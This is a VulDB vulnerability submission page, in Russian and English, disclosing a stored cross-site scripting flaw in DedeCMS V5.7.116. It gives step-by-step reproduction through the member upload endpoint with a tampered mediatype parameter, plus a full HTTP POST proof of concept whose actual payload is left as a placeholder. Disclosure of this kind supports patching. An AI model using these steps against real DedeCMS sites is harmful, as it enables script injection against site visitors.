Отправить #452983: DedeCMS V5.7.116 Cross Site ScriptingИнформация

НазваниеDedeCMS V5.7.116 Cross Site Scripting
ОписаниеSummary DedeCMS V5.7.116 is affected by a stored cross-site scripting vulnerability that can be exploited by an attacker to upload a malicious SWF file, which can lead to XSS attacks. This vulnerability exists due to insufficient input validation and sanitization of user-supplied data. Details Log in and go to http://target-ip/member/uploads_add.php to upload the xss payload in .SWF file. image Intercept the upload request and change the mediatype parameter in the request to 2. image Observe the response, which should include a URL similar to /uploads/userup/1/XXXX.swf. image Access the provided URL to trigger the XSS vulnerability. image POC POST /member/uploads_add.php HTTP/1.1 Host: target-ip Content-Length: 963 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfRghPB9M7esxjc3h Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: [users'cookie] Connection: keep-alive ------WebKitFormBoundaryfRghPB9M7esxjc3h Content-Disposition: form-data; name="f" ------WebKitFormBoundaryfRghPB9M7esxjc3h Content-Disposition: form-data; name="mediatype" 2 ------WebKitFormBoundaryfRghPB9M7esxjc3h Content-Disposition: form-data; name="keyword" ------WebKitFormBoundaryfRghPB9M7esxjc3h Content-Disposition: form-data; name="dopost" save ------WebKitFormBoundaryfRghPB9M7esxjc3h Content-Disposition: form-data; name="title" 123 ------WebKitFormBoundaryfRghPB9M7esxjc3h Content-Disposition: form-data; name="addonfile"; filename="xsstest.swf" Content-Type: application/x-shockwave-flash [xss payload in swf] ------WebKitFormBoundaryfRghPB9M7esxjc3h--
Источник⚠️ https://github.com/Hebing123/cve/issues/77
Пользователь
 jiashenghe (UID 39445)
Представление27.11.2024 09:16 (2 лет назад)
Модерация04.12.2024 17:31 (7 days later)
Статуспринято
Запись VulDB286903 [DedeCMS 5.7.116 SWF File /member/uploads_add.php mediatype межсайтовый скриптинг]
Баллы20

ПредыдущийОбзорДалее

Do you need the next level of professionalism?

Upgrade your account now!